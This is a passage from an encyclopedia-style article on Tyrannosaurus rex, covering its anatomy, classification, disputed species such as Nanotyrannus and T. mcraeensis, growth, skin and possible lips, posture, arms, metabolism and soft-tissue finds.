non-tyrannosaurids. The tip of the upper jaw was U-shaped (most non-tyrannosauroid carnivores had V-shaped upper jaws), which increased the amount of tissue and bone a tyrannosaur could rip out with one bite, although it also increased the stresses on the front teeth. The teeth of T. rex displayed marked heterodonty (differences in shape). The premaxillary teeth, four per side at the front of the upper jaw, were closely packed, D-shaped in cross-section, had reinforcing ridges on the rear surface, were incisiform (their tips were chisel-like blades) and curved backwards. The D-shaped cross-section, reinforcing ridges and backwards curve reduced the risk that the teeth would snap when Tyrannosaurus bit and pulled. The remaining teeth were robust, like "lethal bananas" rather than daggers, more widely spaced and also had reinforcing ridges. Those in the upper jaw, twelve per side in mature individuals, were larger than their counterparts of the lower jaw, except at the rear. The largest found so far is estimated to have been long including the root when the animal was alive, making it the largest tooth of any carnivorous dinosaur yet found. The lower jaw was robust. Its front dentary bone bore thirteen teeth. Behind the tooth row, the lower jaw became notably taller. The upper and lower jaws of Tyrannosaurus, like those of many dinosaurs, possessed numerous foramina, or small holes in the bone. Various functions have been proposed for these foramina, such as a crocodile-like sensory system or evidence of extra-oral structures such as scales or potentially lips, with subsequent research on theropod tooth wear patterns supporting such a proposition. Skeleton The vertebral column of Tyrannosaurus consisted of ten neck vertebrae, thirteen back vertebrae and five sacral vertebrae. The number of tail vertebrae is unknown and could well have varied between individuals but probably numbered at least forty. Sue was mounted with forty-seven of such caudal vertebrae. The neck of T. rex formed a natural S-shaped curve like that of other theropods. Compared to these, it was exceptionally short, deep and muscular to support the massive head. The second vertebra, the axis, was especially short. The remaining neck vertebrae were weakly opisthocoelous, i.e. with a convex front of the vertebral body and a concave rear. The vertebral bodies had single pleurocoels, pneumatic depressions created by air sacs, on their sides. The vertebral bodies of the torso were robust but with a narrow waist. Their undersides were keeled. The front sides were concave with a deep vertical trough. They had large pleurocoels. Their neural spines had very rough front and rear sides for the attachment of strong tendons. The sacral vertebrae were fused to each other, both in their vertebral bodies and neural spines. They were pneumatized. They were connected to the pelvis by transverse processes and sacral ribs. The tail was heavy and moderately long, in order to balance the massive head and torso and to provide space for massive locomotor muscles that attached to the thighbones. The thirteenth tail vertebra formed the transition point between the deep tail base and the middle tail that was stiffened by a rather long front articulation processes. The underside of the trunk was covered by eighteen or nineteen pairs of segmented belly ribs. The shoulder girdle was longer than the entire forelimb. The shoulder blade had a narrow shaft but was exceptionally expanded at its upper end. It connected via a long forward protrusion to the coracoid, which was rounded. Both shoulder blades were connected by a small furcula. The paired breast bones possibly were made of cartilage only. The forelimb or arm was very short. The upper arm bone, the humerus, was short but robust. It had a narrow upper end with an exceptionally rounded head. The lower arm bones, the ulna and radius, were straight elements, much shorter than the humerus. The second metacarpal was longer and wider than the first, whereas normally in theropods the opposite is true. The forelimbs had only two clawed fingers, along with an additional splint-like small third metacarpal representing the remnant of a third digit. The pelvis was a large structure. Its upper bone, the ilium, was both very long and high, providing an extensive attachment area for hindlimb muscles. The front pubic bone ended in an enormous pubic boot, longer than the entire shaft of the element. The rear ischium was slender and straight, pointing obliquely to behind and below. In contrast to the arms, the hindlimbs were among the longest in proportion to body size of any theropod. In the foot, the metatarsus was "arctometatarsalian", meaning that the part of the third metatarsal near the ankle was pinched. The third metatarsal was also exceptionally sinuous. Compensating for the immense bulk of the animal, many bones throughout the skeleton were hollowed, reducing its weight without significant loss of strength. Classification Tyrannosaurus is the type genus of the superfamily Tyrannosauroidea, the family Tyrannosauridae, and the subfamily Tyrannosaurinae; in other words it is the standard by which paleontologists decide whether to include other species in the same group. Other members of the tyrannosaurine subfamily include the North American Daspletosaurus and the Asian Tarbosaurus, both of which have occasionally been synonymized with Tyrannosaurus. Tyrannosaurids were once commonly thought to be descendants of earlier large theropods such as megalosaurs and carnosaurs, although more recently they were reclassified with the generally smaller coelurosaurs. The earliest tyrannosaur group were the crested proceratosaurids, while later and more derived members belong to the Pantyrannosauria. Tyrannosaurs started out as small theropods; however at least some became larger by the Early Cretaceous. Tyrannosauroids are characterized by their fused nasals and dental arrangement. Pantyrannosaurs are characterized by unique features in their hips as well as an enlarged foramen in the quadrate, a broad postorbital and hourglass shaped nasals. Some of the more derived pantyrannosaurs lack nasal pneumaticity and have a lower humerus to femur ratio with their arms starting to see some reduction. Some pantyrannosaurs started developing an arctometatarsus. Eutyrannosaurs have a rough texture on their nasal bones and their mandibular fenestra is reduced externally. Tyrannosaurids lack kinetic skulls or special crests on their nasal bones, and have a lacrimal with a distinctive process on it. Tyrannosaurids also have an interfenestral strut that is less than half as big as the maxillary fenestra. It is quite likely that tyrannosauroids rose to prominence after the decline in allosauroid and megalosauroid diversity seen during the early stages of the Late Cretaceous. Below is a simple cladogram of general tyrannosauroid relationships that was found after an analysis conducted by Li and colleagues in 2009. Many phylogenetic analyses have found Tarbosaurus bataar to be the sister taxon of T. rex. The discovery of the tyrannosaurid Lythronax further indicates that Tarbosaurus and Tyrannosaurus are closely related, forming a clade with fellow Asian tyrannosaurid Zhuchengtyrannus, with Lythronax being their sister taxon. A further study from 2016 by Steve Brusatte, Thomas Carr and colleagues, also indicates that Tyrannosaurus may have been an immigrant from Asia, as well as a possible descendant of Tarbosaurus. Below is the cladogram of Tyrannosauridae based on the phylogenetic analysis conducted by Loewen and colleagues in 2013. In their 2024 description of Tyrannosaurus mcraeensis, Dalman et al. recovered similar results to previous analyses, with Tyrannosaurus as the sister taxon to the clade formed by Tarbosaurus and Zhuchengtyrannus, called the Tyrannosaurini. They also found support for a monophyletic clade containing Daspletosaurus and Thanatotheristes, typically referred to as the Daspletosaurini. Additional species In 1955, Soviet paleontologist Evgeny Maleev named a new species, Tyrannosaurus bataar, from Mongolia. By 1965, this species was renamed as a distinct genus, Tarbosaurus bataar. While most palaeontologists continue to maintain the two as distinct genera, some authors such as Thomas Holtz, Kenneth Carpenter, and Thomas Carr argue that the two species are similar enough to be considered members of the same genus, restoring the Mongolian taxon's original binomial name. Some specimens from the Late Cretaceous deposits of China have been described as new species of Tyrannosaurus: T. lanpingensis based on isolated lateral tooth from the red beds of Yunnan in 1975; T. turpanensis from the Subashi Formation, Turpan Basin, Xinjiang in 1978; and T. luanchuanensis from the Quiba Formation, Tantou Basin, Henan Province in 1979–1980. All these taxa were published without detailed descriptions and were later accepted as junior synonyms of Tarbosaurus bataar by Holtz in 2004. VGI, no. 231/3, a large phalanx bone, assigned to Tyrannosaurus sp. by Yarkov in 2000, was found in the Lower Maastrichtian of Bereslavka, Russia. In 2004, Averianov and Yarkov reinterpreted it as a metacarpal I or metatarsal I that possibly belongs to ceratosaur. In their 2023 overview, Averianov and Lopatin mention this specimen as well as a single tooth from the same site only as Theropoda indet. In 2001, various tyrannosaurid teeth and a metatarsal unearthed in a quarry near Zhucheng, China were assigned by Chinese paleontologist Hu Chengzhi to the newly erected species Tyrannosaurus zhuchengensis. However, in a nearby site, a right maxilla and left jawbone were assigned to the newly erected tyrannosaurid genus Zhuchengtyrannus in 2011. It is possible that T. zhuchengensis is synonymous with Zhuchengtyrannus. In any case, T. zhuchengensis is considered to be a nomen dubium as the holotype lacks diagnostic features below the level Tyrannosaurinae. In 2006, a fragmentary tyrannosaurid lacrimal (CM 9401) from the Judith River Formation of Fergus County, Montana was described as ?Tyrannosaurus sp. This isolated right lacrimal was originally collected alongside the holotype specimen of Deinosuchus rugosus, a giant crocodylian, and remained undescribed until its re-identification as belonging to a tyrannosaurid theropod in the 1980s by paleontologist Dale Russell. The lacrimal closely resembles those of Tyrannosaurus rex in both size and morphology. Notably, it lacks the "lacrimal horn" typically present in earlier tyrannosaurids like Albertosaurus and Gorgosaurus, instead exhibiting a distinct rugosity along the dorsal surface—consistent with T. rex and its Asian relative Tarbosaurus. The specimen's considerable size places it within the range of known T. rex individuals, suggesting the presence of large tyrannosaurids during the Campanian stage (~75 million years ago), a temporal range earlier than the established Maastrichtian age (~68–66 Ma) for Tyrannosaurus rex. However, the exact age and provenance of CM 9401 remain uncertain due to a lack of detailed field documentation. In 2018, a paper describing tyrannosaurid teeth from the Two Medicine Formation noted a premaxillary tooth (YPM VPPU 023469) had a strong resemblance to the teeth of Sue to the exclusion of any Campanian tyrannosaurid. Additionally, the authors of this paper suggested that CM 9401 also comes from the Two Medicine Formation, as there were preservational similarities between its locality and the Willow Creek anticline, which is where the tooth was found. Notably, this would place both specimens in the Flag Butte Member of the Two Medicine Formation, which dates from 77 to 76.3 Ma, far younger than any other Tyrannosaurus specimen, and directly contemporaneous with Daspletosaurus. In 2025, these specimens, with their old geologic age, were used as evidence by Charlie Scherer to suggest that the Tyrannosaurini did not evolve directly from Daspletosaurus. In a 2022 study, Gregory S. Paul and colleagues argued that Tyrannosaurus rex, as traditionally understood, actually represents three species: the type species Tyrannosaurus rex, and two new species: T. imperator (meaning "tyrant lizard emperor") and T. regina (meaning "tyrant lizard queen"). The holotype of the former (T. imperator) is the Sue specimen, and the holotype of the latter (T. regina) is Wankel rex. The division into multiple species was primarily based on the observation of a very high degree of variation in the proportions and robusticity of the femur (and other skeletal elements) across catalogued T. rex specimens, more so than that observed in other theropods recognized as one species. Differences of general body proportions representing robust and gracile morphotypes were also used as a line of evidence, in addition to the number of small, slender incisiform teeth in the dentary, as based on tooth sockets. Specifically, the paper's T. rex was distinguished by robust anatomy, a moderate ratio of femur length vs circumference, and the possession of a singular slender incisiform dentary tooth; T. imperator was considered to be robust with a small femur length to circumference ratio and two of the slender teeth; and T. regina was a gracile form with a high femur ratio and one of the slender teeth. It was observed that variation in proportions and robustness became more extreme higher up in the sample, stratigraphically. This was interpreted as a single earlier population, T. imperator, speciating into more than one taxon, T. rex and T. regina. However, several other leading paleontologists, including Stephen Brusatte, Thomas Carr, Thomas Holtz, David Hone, Jingmai O'Connor, and Lindsay Zanno, criticized the study or expressed skepticism of its conclusions when approached by various media outlets for comment. Their criticism was subsequently published in a technical paper. Holtz and Zanno both remarked that it was plausible that more than one species of Tyrannosaurus existed, but felt the new study was insufficient to support the species it proposed. Holtz remarked that, even if Tyrannosaurus imperator represented a distinct species from Tyrannosaurus rex, it may represent the same species as Nanotyrannus lancensis and would need to be called Tyrannosaurus lancensis. O'Connor, a curator at the Field Museum, where the T. imperator holotype Sue is displayed, regarded the new species as too poorly-supported to justify modifying the exhibit signs. Brusatte, Carr, and O'Connor viewed the distinguishing features proposed between the species as reflecting natural variation within a species. Both Carr and O'Connor expressed concerns about the study's inability to determine which of the proposed species several well-preserved specimens belonged to. Another paleontologist, Philip J. Currie, originally co-authored the study but withdrew from it as he did not want to be involved in naming the new species. Paul still rejected the objections raised by critics, insisting that they are unwilling to consider that Tyrannosaurus might represent more than one species. Tyrannosaurus mcraeensis In 2024, Dalman and colleagues described the remains of a tyrannosaur discovered in 1983 in the Campanian-early Maastrichtian Hall Lake Formation in New Mexico. Reposited at the New Mexico Museum of Natural History and Science, the fossil material (NMMNH P-3698) consists of the right postorbital, right squamosal, left palatine, and an incomplete maxilla from the skull, the left dentary, right splenial, right prearticular, right angular and right articular from the lower jaws, isolated teeth, and chevrons. Some of the bones were briefly mentioned in 1984 as belonging to T. rex, and described in 1986. Lehman and Carpenter (1990) suggested that NMMNH P-3698 belonged to a new tyrannosaurid genus, while Carr and Williamson (2000) disagreed with their claim. Sullivan and Lucas (2015) argued that there is little evidence to support NMMNH P-3698 as a specimen of Tyrannosaurus rex, so they tentatively classified it as cf. Tyrannosaurus sp.; they also considered that the McRae tyrannosaur lived before the Lancian (before 67 million years ago) based on its coexistence with Alamosaurus. Dalman et al. (2024) proposed the new name Tyrannosaurus mcraeensis for the holotype (NMMNH P-3698), referencing the McRae Group, the rock layers to which the Hall Lake Formation belongs. These rock layers were estimated to date to between 72.7 and 70.9 Ma, correlating to the latest Campanian or earliest Maastrichtian. U-Pb zircon age estimates by Schantz and Amato (2024) also support the late Campanian to early Maastrichtian age of the Hall Lake Formation, with the mean estimate of 74.1 ± 0.9 Ma at above the base of the formation and the maximum depositional age of 69.8 ± 0.7 Ma based on a sandstone from this fossil locality. The holotype of T. mcraeensis is found in the strata that are around a few million years older than the accepted range of T. rex, which existed at the end of the Maastrichtian. T. mcraeensis was estimated at long, which is similar to the size of an adult T. rex. The two are distinguished by characters of the skull. Amongst these, the dentary of T. mcraeensis is proportionately longer and possesses a less prominent chin, and the lower jaw shallower than that of T. rex, suggesting a weaker bite. The teeth are likewise blunter and more laterally compressed, while the post orbital crests are less prominent. Likewise, the skeletal anatomy showcases shared characteristics with Tarbosaurus and Zhuchengtyrannus. Nanotyrannus Other tyrannosaurid fossils found in the same formations as T. rex were originally classified as separate taxa, including Aublysodon and Albertosaurus megagracilis, the latter being named Dinotyrannus megagracilis in 1995. These fossils are now universally considered to belong to juvenile T. rex. A small but nearly complete skull from Montana, long, might be an exception. This skull, CMNH 7541, was originally classified as a species of Gorgosaurus (G. lancensis) by Charles W. Gilmore in 1946. In 1988, the specimen was re-described by Robert T. Bakker, Phil Currie, and Michael Williams, then the curator of paleontology at the Cleveland Museum of Natural History, where the original specimen was housed and is now on display. Their initial research indicated that the skull bones were fused, and that it therefore represented an adult specimen. In light of this, Bakker and colleagues assigned the skull to a new genus named Nanotyrannus (meaning "dwarf tyrant", for its apparently small adult size). The specimen is estimated to have been around long when it died. However, In 1999, a detailed analysis by Thomas Carr revealed the specimen to be a juvenile, leading Carr and many other paleontologists to consider it a juvenile T. rex individual. In 2001, a more complete juvenile tyrannosaur (nicknamed "Jane", catalog number BMRP 2002.4.1), belonging to the same species as the original Nanotyrannus specimen, was uncovered. This discovery prompted a conference on tyrannosaurs focused on the issues of Nanotyrannus validity at the Burpee Museum of Natural History in 2005. Several paleontologists who had previously published opinions that N. lancensis was a valid species, including Currie and Williams, saw the discovery of "Jane" as a confirmation that Nanotyrannus was, in fact, a juvenile T. rex. Peter Larson continued to support the hypothesis that N. lancensis was a separate but closely related species, based on skull features such as two more teeth in both jaws than T. rex; as well as proportionately larger hands with phalanges on the third metacarpal and different wishbone anatomy in an undescribed specimen. He also argued that Stygivenator, generally considered to be a juvenile T. rex, may be a younger Nanotyrannus specimen. Later research revealed that other tyrannosaurids such as Gorgosaurus also experienced reduction in tooth count during growth, and given the disparity in tooth count between individuals of the same age group in this genus and Tyrannosaurus, this feature may also be due to individual variation. In 2013, Carr noted that all of the differences claimed to support Nanotyrannus have turned out to be individually or ontogenetically variable features or products of distortion of the bones. In 2016, analysis of limb proportions by Persons and Currie suggested Nanotyrannus specimens to have differing cursoriality levels, potentially separating it from T. rex. However, paleontologist Manabu Sakomoto has commented that this conclusion may be impacted by low sample size, and the discrepancy does not necessarily reflect taxonomic distinction. In 2016, Joshua Schmerge argued for Nanotyrannus' validity based on skull features, including a dentary groove in BMRP 2002.4.1's skull. According to Schmerge, as that feature is absent in T. rex and found only in Dryptosaurus and albertosaurines, this suggests Nanotyrannus is a distinct taxon within the Albertosaurinae. The same year, Carr and colleagues noted that this was insufficient to clarify Nanotyrannus' validity or classification, being a common and ontogenetically variable feature among tyrannosauroids. A 2020 study by Holly Woodward and colleagues showed the specimens referred to Nanotyrannus were all ontogenetically immature and found it probable that these specimens belonged to T. rex. The same year, Carr published a paper on T. rex's growth history, finding that CMNH 7541 fit within the expected ontogenetic variation of the taxon and displayed juvenile characteristics found in other specimens. It was classified as a juvenile, under 13 years old with a skull less than . No significant sexual or phylogenetic variation was discernible among any of the 44 specimens studied, with Carr stating that characters of potential phylogenetic importance decrease throughout age at the same rate as growth occurs. Discussing the paper's results, Carr described how all Nanotyrannus specimens formed a continual growth transition between the smallest juveniles and the subadults, unlike what would be expected if it were a distinct taxon where the specimens would group to the exclusion of Tyrannosaurus. Carr concluded that "the 'nanomorphs' are not all that similar to each other and instead form an important bridge in the growth series of T. rex that captures the beginnings of the profound change from the shallow skull of juveniles to the deep skull that is seen in fully-developed adults." However, a 2024 paper published by Nick Longrich and Evan Thomas Saitta reexamined the holotype and referred specimens of Nanotyrannus. Based on several factors, including differences in morphology, ontogeny, and phylogeny, Longrich and Saitta suggest that Nanotyrannus is a distinct taxon which may fall outside of Tyrannosauridae, based on some of their phylogenetic analyses. Paleobiology Life history The identification of several specimens as juvenile T. rex has allowed scientists to document ontogenetic changes in the species, estimate the lifespan, and determine how quickly the animals would have grown. The smallest known individual (LACM 28471, the "Jordan theropod") is estimated to have weighed only , while the largest adults, such as FMNH PR2081 (Sue) most likely weighed about . Histologic analysis of T. rex bones showed LACM 28471 had aged only 2 years when it died, while Sue was 28 years old, an age which may have been close to the maximum for the species. Histology has also allowed the age of other specimens to be determined. Growth curves can be developed when the ages of different specimens are plotted on a graph along with their mass. A T. rex growth curve is S-shaped, with juveniles remaining under until approximately 14 years of age, when body size began to increase dramatically. During this rapid growth phase, a young T. rex would gain an average of a year for the next four years. At 18 years of age, the curve plateaus again, indicating that growth slowed dramatically. For example, only separated the 28-year-old Sue from a 22-year-old Canadian specimen (RTMP 81.12.1). A 2004 histological study performed by different workers corroborates these results, finding that rapid growth began to slow at around 16 years of age. A study by Hutchinson and colleagues in 2011 corroborated the previous estimation methods in general, but their estimation of peak growth rates is significantly higher; it found that the "maximum growth rates for T. rex during the exponential stage are 1790 kg/year". Although these results were much higher than previous estimations, the authors noted that these results significantly lowered the great difference between its actual growth rate and the one which would be expected of an animal of its size. The sudden change in growth rate at the end of the growth spurt may indicate physical maturity, a hypothesis which is supported by the discovery of medullary tissue in the femur of a 16 to 20-year-old T. rex from Montana (MOR 1125, also known as B-rex). Medullary tissue is found only in female birds during ovulation, indicating that B-rex was of reproductive age. Further study indicates an age of 18 for this specimen. In 2016, it was finally confirmed by Mary Higby Schweitzer and Lindsay Zanno and colleagues that the soft tissue within the femur of MOR 1125 was medullary tissue. This also confirmed the identity of the specimen as a female. The discovery of medullary bone tissue within Tyrannosaurus may prove valuable in determining the sex of other dinosaur species in future examinations, as the chemical makeup of medullary tissue is unmistakable. Other tyrannosaurids exhibit extremely similar growth curves, although with lower growth rates corresponding to their lower adult sizes. An additional study published in 2020 by Woodward and colleagues, for the journal Science Advances indicates that during their growth from juvenile to adult, Tyrannosaurus was capable of slowing down its growth to counter environmental factors such as lack of food. The study, focusing on two juvenile specimens between 13 and 15 years old housed at the Burpee Museum in Illinois, indicates that the rate of maturation for Tyrannosaurus was dependent on resource abundance. This study also indicates that in such changing environments, Tyrannosaurus was particularly well-suited to an environment that shifted yearly in regards to resource abundance, hinting that other midsize predators might have had difficulty surviving in such harsh conditions and explaining the niche partitioning between juvenile and adult tyrannosaurs. The study further indicates that Tyrannosaurus and the dubious genus Nanotyrannus are synonymous, due to analysis of the growth rings in the bones of the two specimens studied. Over half of the known T. rex specimens appear to have died within six years of reaching sexual maturity, a pattern which is also seen in other tyrannosaurs and in some large, long-lived birds and mammals today. These species are characterized by high infant mortality rates, followed by relatively low mortality among juveniles. Mortality increases again following sexual maturity, partly due to the stresses of reproduction. One study suggests that the rarity of juvenile T. rex fossils is due in part to low juvenile mortality rates; the animals were not dying in large numbers at these ages, and thus were not often fossilized. This rarity may also be due to the incompleteness of the fossil record or to the bias of fossil collectors towards larger, more spectacular specimens. In a 2013 lecture, Thomas Holtz Jr. suggested that dinosaurs "lived fast and died young" because they reproduced quickly whereas mammals have long lifespans because they take longer to reproduce. Gregory S. Paul also writes that Tyrannosaurus reproduced quickly and died young but attributes their short lifespans to the dangerous lives they lived. Skin and possible filamentous feathering The discovery of feathered dinosaurs led to debate regarding whether, and to what extent, Tyrannosaurus might have been feathered. Filamentous structures, which are commonly recognized as the precursors of feathers, have been reported in the small-bodied, basal tyrannosauroid Dilong paradoxus from the Early Cretaceous Yixian Formation of China in 2004. Because integumentary impressions of larger tyrannosauroids known at that time showed evidence of scales, the researchers who studied Dilong speculated that insulating feathers might have been lost by larger species due to their smaller surface-to-volume ratio. The subsequent discovery of the giant species Yutyrannus huali, also from the Yixian, showed that even some large tyrannosauroids had feathers covering much of their bodies, casting doubt on the hypothesis that they were a size-related feature. A 2017 study reviewed known skin impressions of tyrannosaurids, including those of a Tyrannosaurus specimen nicknamed "Wyrex" (HMNS 2006.1743.01, formerly known as BHI 6230) which preserves patches of mosaic scales on the tail, hip, and neck. The study concluded that feather covering of large tyrannosaurids such as Tyrannosaurus was, if present, limited to the upper side of the trunk. A conference abstract published in 2016 posited that theropods such as Tyrannosaurus had their upper teeth covered in lips, instead of bare teeth as seen in crocodilians. This was based on the presence of enamel, which according to the study needs to remain hydrated, an issue not faced by aquatic animals like crocodilians. However, there has been criticism where it favors the idea for lips, with the 2017 analytical study proposing that tyrannosaurids had large, flat scales on their snouts instead of lips, as modern crocodiles do. But crocodiles possess rather cracked keratinized skin, not flat scales; by observing the hummocky rugosity of tyrannosaurids, and comparing it to extant lizards, researchers have found that tyrannosaurids had squamose scales rather than a crocodillian-like skin. In 2023, Cullen and colleagues supported the idea that theropods like tyrannosaurids had lips based on anatomical patterns, such as those of the foramina on their face and jaws, more similar to those of modern squamates such as monitor lizards or marine iguanas than those of modern crocodilians like alligators. Comparison of the teeth of Daspletosaurus and American alligators shows that the enamel of tyrannosaurids had no significant wear and that the teeth of modern crocodilians were eroded on the labial side and were substantially worn. This suggests that it is likely that theropod teeth were kept wet by lips. On the basis of the relationship between hydration and wear resistance, the authors argued that it is unlikely that the teeth of theropods, including tyrannosaurids, would have remained unworn when exposed for a long time, because it would have been hard to maintain hydration. The authors also performed regression analyses to demonstrate the relationship between tooth height and skull length, and found that varanids like the crocodile monitor had substantially greater ratios of tooth height to skull length than those of Tyrannosaurus, indicating that the teeth of theropods were not too big to be covered by extraoral tissues when the mouth was closed. Sexual dimorphism As the number of known specimens increased, scientists began to analyze the variation between individuals and discovered what appeared to be two distinct body types, or morphs, similar to some other theropod species. As one of these morphs was more solidly built, it was termed the 'robust' morph while the other was termed 'gracile'. Several morphological differences associated with the two morphs were used to analyze sexual dimorphism in T. rex, with the 'robust' morph usually suggested to be female. For example, the pelvis of several 'robust' specimens seemed to be wider, perhaps to allow the passage of eggs. It was also thought that the 'robust' morphology correlated with a reduced chevron on the first tail vertebra, also ostensibly to allow eggs to pass out of the reproductive tract, as had been erroneously reported for crocodiles. In recent years, evidence for sexual dimorphism has been weakened. A 2005 study reported that previous claims of sexual dimorphism in crocodile chevron anatomy were in error, casting doubt on the existence of similar dimorphism between T. rex sexes. A full-sized chevron was discovered on the first tail vertebra of Sue, an extremely robust individual, indicating that this feature could not be used to differentiate the two morphs anyway. As T. rex specimens have been found from Saskatchewan to New Mexico, differences between individuals may be indicative of geographic variation rather than sexual dimorphism. The differences could also be age-related, with 'robust' individuals being older animals. Only a single Tyrannosaurus specimen has been conclusively shown to belong to a specific sex. Examination of B-rex demonstrated the preservation of soft tissue within several bones. Some of this tissue has been identified as a medullary tissue, a specialized tissue grown only in modern birds as a source of calcium for the production of eggshell during ovulation. As only female birds lay eggs, medullary tissue is only found naturally in females, although males are capable of producing it when injected with female reproductive hormones like estrogen. This strongly suggests that B-rex was female and that she died during ovulation. Recent research has shown that medullary tissue is never found in crocodiles, which are thought to be the closest living relatives of dinosaurs. The shared presence of medullary tissue in birds and other theropod dinosaurs is further evidence of the close evolutionary relationship between the two. Posture Like many bipedal dinosaurs, T. rex was historically depicted as a 'living tripod', with the body at 45 degrees or less from the vertical and the tail dragging along the ground, similar to a kangaroo. This concept dates from Joseph Leidy's 1865 reconstruction of Hadrosaurus, the first to depict a dinosaur in a bipedal posture. In 1915, convinced that the creature stood upright, Henry Fairfield Osborn, former president of the American Museum of Natural History, further reinforced the notion in unveiling the first complete T. rex skeleton arranged this way. It stood in an upright pose for 77 years, until it was dismantled in 1992. By 1970, scientists realized this pose was incorrect and could not have been maintained by a living animal, as it would have resulted in the dislocation or weakening of several joints, including the hips and the articulation between the head and the spinal column. The inaccurate AMNH mount inspired similar depictions in many films and paintings (such as Rudolph Zallinger's famous mural The Age of Reptiles in Yale University's Peabody Museum of Natural History) until the 1990s, when films such as Jurassic Park introduced a more accurate posture to the general public. Modern representations in museums, art, and film show T. rex with its body approximately parallel to the ground with the tail extended behind the body to balance the head. To sit down, Tyrannosaurus may have settled its weight backwards and rested its weight on a pubic boot, the wide expansion at the end of the pubis in some dinosaurs. With its weight rested on the pelvis, it may have been free to move the hindlimbs. Getting back up again might have involved some stabilization from the diminutive forelimbs. The latter known as Newman's pushup theory has been debated. Nonetheless, Tyrannosaurus was probably able to get up if it fell, which only would have required placing the limbs below the center of gravity, with the tail as an effective counterbalance. Healed stress fractures in the forelimbs have been put forward both as evidence that the arms cannot have been very useful and as evidence that they were indeed used and acquired wounds, like the rest of the body. Arms When T. rex was first discovered, the humerus was the only element of the forelimb known. For the initial mounted skeleton as seen by the public in 1915, Osborn substituted longer, three-fingered forelimbs like those of Allosaurus. A year earlier, Lawrence Lambe described the short, two-fingered forelimbs of the closely related Gorgosaurus. This strongly suggested that T. rex had similar forelimbs, but this hypothesis was not confirmed until the first complete T. rex forelimbs were identified in 1989, belonging to MOR 555 (the "Wankel rex"). The remains of Sue also include complete forelimbs. T. rex arms are very small relative to overall body size, measuring only long, and some scholars have labelled them as vestigial. However, the bones show large areas for muscle attachment, indicating considerable strength. This was recognized as early as 1906 by Osborn, who speculated that the forelimbs may have been used to grasp a mate during copulation. Newman (1970) suggested that the forelimbs were used to assist Tyrannosaurus in rising from a prone position. Since then, other functions have been proposed, although some scholars find them implausible. Padian (2022) argued that the reduction of the arms in tyrannosaurids did not serve a particular function but was a secondary adaptation, stating that as tyrannosaurids developed larger and more powerful skulls and jaws, the arms got smaller to avoid being bitten or torn by other individuals, particularly during group feedings. Another possibility is that the forelimbs held struggling prey while it was killed by the tyrannosaur's enormous jaws. This hypothesis may be supported by biomechanical analysis. T. rex forelimb bones exhibit extremely thick cortical bone, which has been interpreted as evidence that they were developed to withstand heavy loads. The biceps brachii muscle of an adult T. rex was capable of lifting by itself; other muscles such as the brachialis would work along with the biceps to make elbow flexion even more powerful. The M. biceps muscle of T. rex was 3.5 times as powerful as the human equivalent. A T. rex forearm had a limited range of motion, with the shoulder and elbow joints allowing only 40 and 45 degrees of motion, respectively. In contrast, the same two joints in Deinonychus allow up to 88 and 130 degrees of motion, respectively, while a human arm can rotate 360 degrees at the shoulder and move through 165 degrees at the elbow. The heavy build of the arm bones, strength of the muscles, and limited range of motion may indicate a system evolved to hold fast despite the stresses of a struggling prey animal. In the first detailed scientific description of Tyrannosaurus forelimbs, paleontologists Kenneth Carpenter and Matt Smith dismissed notions that the forelimbs were useless or that Tyrannosaurus was an obligate scavenger. The idea that the arms served as weapons when hunting prey have also been proposed by Steven M. Stanley, who suggested that the arms were used for slashing prey, especially by using the claws to rapidly inflict long, deep gashes to its prey. This was dismissed by Padian, who argued that Stanley based his conclusion on incorrectly estimated forelimb size and range of motion. Thermoregulation Tyrannosaurus, like most dinosaurs, was long thought to have an ectothermic ("cold-blooded") reptilian metabolism. The idea of dinosaur ectothermy was challenged by scientists like Robert T. Bakker and John Ostrom in the early years of the "Dinosaur Renaissance", beginning in the late 1960s. T. rex itself was claimed to have been endothermic ("warm-blooded"), implying a very active lifestyle. Since then, several paleontologists have sought to determine the ability of Tyrannosaurus to regulate its body temperature. Histological evidence of high growth rates in young T. rex, comparable to those of mammals and birds, may support the hypothesis of a high metabolism. Growth curves indicate that, as in mammals and birds, T. rex growth was limited mostly to immature animals, rather than the indeterminate growth seen in most other vertebrates. Oxygen isotope ratios in fossilized bone are sometimes used to determine the temperature at which the bone was deposited, as the ratio between certain isotopes correlates with temperature. In one specimen, the isotope ratios in bones from different parts of the body indicated a temperature difference of no more than between the vertebrae of the torso and the tibia of the lower leg. This small temperature range between the body core and the extremities was claimed by paleontologist Reese Barrick and geochemist William Showers to indicate that T. rex maintained a constant internal body temperature (homeothermy) and that it enjoyed a metabolism somewhere between ectothermic reptiles and endothermic mammals. Other scientists have pointed out that the ratio of oxygen isotopes in the fossils today does not necessarily represent the same ratio in the distant past, and may have been altered during or after fossilization (diagenesis). Barrick and Showers have defended their conclusions in subsequent papers, finding similar results in another theropod dinosaur from a different continent and tens of millions of years earlier in time (Giganotosaurus). Ornithischian dinosaurs also showed evidence of homeothermy, while varanid lizards from the same formation did not. In 2022, Wiemann and colleagues used a different approach—the spectroscopy of lipoxidation signals, which are byproducts of oxidative phosphorylation and correlate with metabolic rates—to show that various dinosaur genera including Tyrannosaurus had endothermic metabolisms, on par with that of modern birds and higher than that of mammals. They also suggested that such a metabolism was ancestrally common to all dinosaurs. Even if T. rex does exhibit evidence of homeothermy, it does not necessarily mean that it was endothermic. Such thermoregulation may also be explained by gigantothermy, as in some living sea turtles. Similar to contemporary crocodilians, openings (dorsotemporal fenestrae) in the skull roofs of Tyrannosaurus may have aided thermoregulation. Soft tissue In the March 2005 issue of Science, Mary Higby Schweitzer of North Carolina State University and colleagues announced the recovery of soft tissue from the marrow cavity of a fossilized leg bone from a T. rex. The bone had been intentionally, though reluctantly, broken for shipping and then not preserved in the normal manner, specifically because Schweitzer was hoping to test it for soft tissue. Designated as the Museum of the Rockies specimen 1125, or MOR 1125, the dinosaur was previously excavated from the Hell Creek Formation. Flexible, bifurcating blood vessels and fibrous but elastic bone matrix tissue were recognized. In addition, microstructures resembling blood cells were found inside the matrix and vessels. The structures bear resemblance to ostrich blood cells and vessels. Whether an unknown process, distinct from normal fossilization, preserved the material, or the material is original, the researchers do not know, and they are careful not to make any claims about preservation. If it is found to be original material, any surviving proteins may be used as a means of indirectly guessing some of the DNA content of the dinosaurs involved, because each protein is typically created by a specific gene. The absence of previous finds may be the result of people assuming preserved tissue was impossible, therefore not looking. Since the first, two more tyrannosaurs and a hadrosaur have also been found to have such tissue-like structures. Research on some of the tissues involved has suggested that birds are closer relatives to tyrannosaurs than other modern animals. The original endogenous chemistry was also found in MOR 1125 based on preservation of elements associated with bone remodeling and redeposition (sulfur, calcium, zinc), which showed that the 